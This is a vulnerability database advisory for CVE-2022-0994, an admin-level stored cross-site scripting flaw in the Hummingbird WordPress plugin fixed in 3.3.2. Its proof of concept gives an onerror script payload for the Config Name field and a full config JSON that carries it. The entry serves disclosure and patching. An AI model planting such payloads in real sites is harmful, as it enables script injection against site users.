WordPress Plugin Vulnerabilities

Hummingbird < 3.3.2 - Admin+ Stored Cross-Site Scripting

Description

The plugin does not sanitise and escape the Config Name, which could allow high privilege users, such as admin to perform cross-Site Scripting attacks even when the unfiltered_html capability is disallowed

Proof of Concept

Go to Hummingbird's Settings > Configs > edit the "Name and Description" and put the following payload in the Name field: <img src onerror=alert(/XSS/)>

Save and Click 'Apply' to trigger the XSS

Go to Hummingbird's Settings > Configs and Upload the following config
{
  "id": 1,
  "name": "<img src onerror=alert(/XSS/)>",
  "description": "Xss",
  "config": {
    "configs": {
      "settings": {
        "advanced": {
          "query_string": false,
          "emoji": false,
          "cart_fragments": false,
          "lazy_load": {
            "enabled": false
          }
        },
        "database": {
          "reports": {
            "enabled": false
          }
        },
        "gravatar": {
          "enabled": true
        },
        "page_cache": {
          "enabled": true,
          "detection": "auto",
          "integrations": {
            "varnish": false,
            "opcache": false
          },
          "preload": false
        },
        "performance": [],
        "rss": {
          "enabled": true,
          "duration": 3600
        },
        "settings": {
          "accessible_colors": false,
          "remove_settings": false,
          "remove_data": false,
          "control": true
        },
        "uptime": {
          "enabled": false
        }
      }
    },
    "strings": {
      "advanced": [
        "Remove query strings from assets - Inactive\nRemove Emoji JS & CSS files - Inactive\nDisable WooCommerce cart fragments - Inactive\nComments lazy loading - Inactive\n"
      ],
      "database": [
        ""
      ],
      "gravatar": [
        "Gravatar cache - Active\n"
      ],
      "page_cache": [
        "Page cache - Active\nFile change detection - Auto\nPurge Varnish cache - Inactive\nPurge OpCache - Inactive\nCache preloading - Inactive\n"
      ],
      "rss": [
        "RSS caching - Active\n"
      ],
      "settings": [
        "High contrast mode - Inactive\nRemove settings on uninstall - Inactive\nRemove data on uninstall - Inactive\nCache control in admin bar - Active\n"
      ],
      "uptime": [
        "Uptime - Inactive\n"
      ]
    }
  },
  "plugin": "1081721"
}

Affects Plugins

Plugin icon
hummingbird-performance
Fixed in 3.3.2

References

CVE
CVE-2022-0994

Classification

Type
XSS
OWASP top 10
A7: Cross-Site Scripting (XSS)
CWE
CWE-79
CVSS
3.4 (low)

Miscellaneous

Original Researcher
Taurus Omar
Submitter
Taurus Omar
Submitter website
https://taurusomar.com
Submitter twitter
TaurusOmar_
Verified
Yes
WPVDB ID
e9dd62fc-bb79-4a6b-b99c-60e40f010d7a

Timeline

Publicly Published
2022-03-23 (about 2 years ago)
Added
2022-03-23 (about 2 years ago)
Last Updated
2022-04-13 (about 2 years ago)

Other

Published
Title
Published
2022-09-07
Title
Donation Thermometer < 2.1.3 - Admin+ Stored Cross-Site Scripting
Published
2018-08-31
Title
UserPro <= 4.9.23 - Unauthenticated Cross-Site Scripting (XSS)
Published
2022-03-24
Title
FV Flowplayer Video Player < 7.5.19.727 - Contributor+ Stored Cross-Site Scripting
Published
2021-12-06
Title
Chaty Free < 2.8.3 & Pro < 2.8.2 - Reflected Cross-Site Scripting
Published
2014-08-01
Title
WordPress 1.5 template-functions-post.php Multiple Field XSS